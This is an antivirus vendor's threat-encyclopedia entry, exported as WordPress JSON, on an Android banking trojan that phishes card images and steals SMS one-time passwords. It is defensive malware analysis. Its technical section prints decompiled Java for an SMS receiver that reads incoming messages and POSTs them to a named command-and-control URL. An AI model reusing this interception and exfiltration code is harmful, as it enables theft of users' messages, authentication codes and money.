{"id":1303,"date":"2023-01-04T12:16:11","date_gmt":"2023-01-04T12:16:11","guid":{"rendered":"https:\/\/threats.amnpardaz.com\/en\/?p=1303"},"modified":"2024-02-21T13:13:02","modified_gmt":"2024-02-21T13:13:02","slug":"trojan-android-smsspy-irpardakht","status":"publish","type":"post","link":"https:\/\/threats.amnpardaz.com\/en\/2023\/01\/04\/trojan-android-smsspy-irpardakht\/","title":{"rendered":"Trojan.Android.SmsSpy.Irpardakht"},"content":{"rendered":"<h2>Overview<\/h2>\n<p><strong>Type:<\/strong> Trojan<\/p>\n<p><strong>\u00a0Destruction Level<\/strong>: Moderate<\/p>\n<p><strong>Prevalence:<\/strong> Moderate<\/p>\n<h2>What is the Trojan?<\/h2>\n<p>Trojans are malware types that introduce themselves as healthy and legal software and act similarly to practical and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching it to an email, etc. are ways that Trojans use to enter the system. Contrary to viruses and computer worms, Trojans are not reproducible.<\/p>\n<h2>What is SmsSpy.Irpardakht malware family?<\/h2>\n<p>There are a bunch of infected applications aimed at phishing attacks and accessing users&#8217; banking accounts distributed through prominent markets such as Caf\u00e9 Bazaar, and Myket as well as other illegible sites and markets, Telegram channels, or SMSes containing infected links. These kinds of malware represent themselves as legit and applicable applications but not only provide no useful and positive services, but will steal users&#8217; important information using phishing attacks.<\/p>\n<p>Their procedure is to give the clients false claims such as payment services, access to judiciary, and other financial and monetary services and sometimes demanded an amount of money through fake payment pages. As soon as the users enter their information (in the present malware the information is the Credit Card image) the attach will receive them, and the attacker can easily access the SMS, the user&#8217;s cellular data, and the second password to easily steal the money.<\/p>\n<p>&nbsp;<\/p>\n<h3>Technical Review<br \/>\nSigns of Infection<\/h3>\n<p>The Vam Pey malware application receives permissions such as reading and receiving SMS when installed. Then after installation, it will display the following image, and after receiving the user&#8217;s personal information right after the authentication it demands the user to upload a national card picture, ID Card picture, Credit Card picture, and user&#8217;s picture. If the users upload their Credit Card picture, then the attacker can receive the user&#8217;s dynamic password by accessing SMS and steal all user&#8217;s money easily.<\/p>\n<h2><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1321\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2023\/02\/20.jpg\" alt=\"\" width=\"656\" height=\"380\" \/><\/h2>\n<h2>Performance Description<\/h2>\n<h4>The \u201cIr.pardakht.MainActivity\u201d Activity<\/h4>\n<p>In this activity, the malware uses the POST method to inform its server that the user has installed the malware by sending the phone build ID.<\/p>\n<p>Then it displays the <a href=\"https:\/\/img.pikacu.site\/vampey\/index.htm\">https:\/\/img.pikacu.site\/vampey\/index.htm<\/a> inside a web view.<\/p>\n<p><img loading=\"lazy\" decoding=\"async\" class=\"alignnone size-full wp-image-1322\" src=\"https:\/\/threats.amnpardaz.com\/en\/wp-content\/uploads\/sites\/5\/2023\/02\/20-1.jpg\" alt=\"\" width=\"657\" height=\"500\" \/><\/p>\n<h4>Ir.pardakht.Sms receiver<\/h4>\n<p>As soon as receiving the message, the receiver will be active for the user.<\/p>\n<p>The receiver uses SmsMessage class and its methods to steal the user\u2019s SMS as follows:<\/p>\n<p>getDisplayOriginatingAddress() method: accessing the sender&#8217;s phone number<\/p>\n<p>getDisplayMessageBody() method: accessing the message text<\/p>\n<p>&nbsp;<\/p>\n<p><strong>public<\/strong> <strong>void<\/strong> onReceive(Context context, Intent intent) {<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Bundle extras = intent.getExtras();<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>if<\/strong> (extras != <strong>null<\/strong>) {<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>try<\/strong> {<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>for<\/strong> (Object obj : (Object[]) extras.get(&#8220;pdus&#8221;)) {<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>SmsMessage createFromPdu = SmsMessage.createFromPdu((<strong>byte<\/strong>[]) obj);<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>String displayOriginatingAddress = createFromPdu.getDisplayOriginatingAddress();<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>String displayMessageBody = createFromPdu.getDisplayMessageBody();<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>this<\/strong>.num = displayOriginatingAddress;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>this<\/strong>.txt = displayMessageBody;<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Log.i(&#8220;SmsReceiver&#8221;, &#8220;.&#8221;);<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Toast.makeText(context, &#8220;.&#8221;, 1).show();<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>try<\/strong> {<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p><strong>new<\/strong> SendPostRequest(<strong>this<\/strong>).execute(<strong>new<\/strong> String[0]);<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>} <strong>catch<\/strong> (Exception e) {<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Toast.makeText(context, &#8220;SMS faild, please try again later!&#8221;, 1).show();<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>e.printStackTrace();<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>} <strong>catch<\/strong> (Exception e2) {<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>Log.e(&#8220;SmsReceiver&#8221;, <strong>new<\/strong> StringBuffer().append(&#8220;Exception smsReceiver&#8221;).append(e2).toString());<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>In this receiver, the malware sends the user&#8217;s SMS to its malicious server &#8220;https:\/\/img.pikacu.site\/vampey\/app.php \u201c as JSON using the POST method.<\/p>\n<p><strong>protected<\/strong> String doInBackground2(String&#8230; Starr) {<\/p>\n<p>&nbsp;<\/p>\n<p><strong>try<\/strong> {<\/p>\n<p>&nbsp;<\/p>\n<p>URL url = <strong>new<\/strong> URL(&#8220;https:\/\/img.pikacu.site\/vampey\/app.php&#8221;);<\/p>\n<p>&nbsp;<\/p>\n<p>JSONObject jSONObject = <strong>new<\/strong> JSONObject();<\/p>\n<p>&nbsp;<\/p>\n<p>jSONObject.put(&#8220;id&#8221;, Build.ID);<\/p>\n<p>&nbsp;<\/p>\n<p>jSONObject.put(&#8220;link&#8221;, &#8220;&#8221;);<\/p>\n<p>&nbsp;<\/p>\n<p>jSONObject.put(&#8220;msg&#8221;, <strong>this<\/strong>.this$0.txt);<\/p>\n<p>&nbsp;<\/p>\n<p>jSONObject.put(&#8220;num&#8221;, <strong>this<\/strong>.this$0.num);<\/p>\n<p>&nbsp;<\/p>\n<p>Log.e(&#8220;params&#8221;, jSONObject.toString());<\/p>\n<p>&nbsp;<\/p>\n<p>HttpURLConnection httpURLConnection = (HttpURLConnection) url.openConnection();<\/p>\n<p>&nbsp;<\/p>\n<p>httpURLConnection.setReadTimeout(15000);<\/p>\n<p>&nbsp;<\/p>\n<p>httpURLConnection.setConnectTimeout(15000);<\/p>\n<p>&nbsp;<\/p>\n<p>httpURLConnection.setRequestMethod(&#8220;POST&#8221;);<\/p>\n<p>&nbsp;<\/p>\n<p>httpURLConnection.setDoInput(<strong>true<\/strong>);<\/p>\n<p>&nbsp;<\/p>\n<p>httpURLConnection.setDoOutput(<strong>true<\/strong>);<\/p>\n<p>&nbsp;<\/p>\n<p>OutputStream outputStream = httpURLConnection.getOutputStream();<\/p>\n<p>&nbsp;<\/p>\n<p>BufferedWriter bufferedWriter = <strong>new<\/strong> BufferedWriter(<strong>new<\/strong> OutputStreamWriter(outputStream, &#8220;UTF-8&#8221;));<\/p>\n<p>&nbsp;<\/p>\n<p>bufferedWriter.write(<strong>this<\/strong>.this$0.getPostDataString(jSONObject));<\/p>\n<p>&nbsp;<\/p>\n<p>bufferedWriter.flush();<\/p>\n<p>&nbsp;<\/p>\n<p>bufferedWriter.close();<\/p>\n<p>&nbsp;<\/p>\n<p>outputStream.close();<\/p>\n<p>&nbsp;<\/p>\n<p><strong>int<\/strong> responseCode = httpURLConnection.getResponseCode();<\/p>\n<p>&nbsp;<\/p>\n<p><strong>if<\/strong> (responseCode == 200) {<\/p>\n<p>&nbsp;<\/p>\n<p>BufferedReader bufferedReader = <strong>new<\/strong> BufferedReader(<strong>new<\/strong> InputStreamReader(httpURLConnection.getInputStream()));<\/p>\n<p>&nbsp;<\/p>\n<p>StringBuffer stringBuffer = <strong>new<\/strong> StringBuffer(&#8220;&#8221;);<\/p>\n<p>&nbsp;<\/p>\n<p>String readLine = bufferedReader.readLine();<\/p>\n<p>&nbsp;<\/p>\n<p><strong>if<\/strong> (readLine != <strong>null<\/strong>) {<\/p>\n<p>&nbsp;<\/p>\n<p>stringBuffer.append(readLine);<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>bufferedReader.close();<\/p>\n<p>&nbsp;<\/p>\n<p><strong>return<\/strong> stringBuffer.toString();<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p><strong>return<\/strong> <strong>new<\/strong> StringBuffer().append(&#8220;false : &#8220;).append(responseCode).toString();<\/p>\n<p>&nbsp;<\/p>\n<p>} <strong>catch<\/strong> (Exception e) {<\/p>\n<p>&nbsp;<\/p>\n<p><strong>return<\/strong> <strong>new<\/strong> StringBuffer().append(&#8220;Exception: &#8220;).append(e.getMessage()).toString();<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<p>}<\/p>\n<p>&nbsp;<\/p>\n<h3><strong>How to deal with and clean the system?<\/strong><\/h3>\n<p>To be sure your system is safe, it is highly recommended to install <a href=\"https:\/\/padvish.com\/fa-ir\/main\">Padvish Antivirus<\/a> and keep its database file updated and scan your system repeatedly.<\/p>\n<h3>How to prevent your phone from infection:<\/h3>\n<ul>\n<li>Don\u2019t download and install applications from untrusted and unauthorized app stores.<\/li>\n<li>Pay attention to the permission when installing the application<\/li>\n<li>Repeatedly back up your data and important files on your phone<\/li>\n<li>Don&#8217;t use an unofficial version of applications. Applications such as Telegram and Instagram have multiple unofficial versions which distribute through Telegram channels.<\/li>\n<\/ul>\n<p>&nbsp;<\/p>\n","protected":false},"excerpt":{"rendered":"<p>Overview Type: Trojan \u00a0Destruction Level: Moderate Prevalence: Moderate What is the Trojan? Trojans are malware types that introduce themselves as healthy and legal software and act similarly to practical and applicable software but cause many destructions to the system when executing. The downloaded software from the internet, placing HTML text, attaching it to an email,&hellip;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[2],"tags":[],"class_list":["post-1303","post","type-post","status-publish","format-standard","hentry","category-trojan"],"_links":{"self":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1303","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/comments?post=1303"}],"version-history":[{"count":6,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1303\/revisions"}],"predecessor-version":[{"id":1443,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/posts\/1303\/revisions\/1443"}],"wp:attachment":[{"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/media?parent=1303"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/categories?post=1303"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/threats.amnpardaz.com\/en\/wp-json\/wp\/v2\/tags?post=1303"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}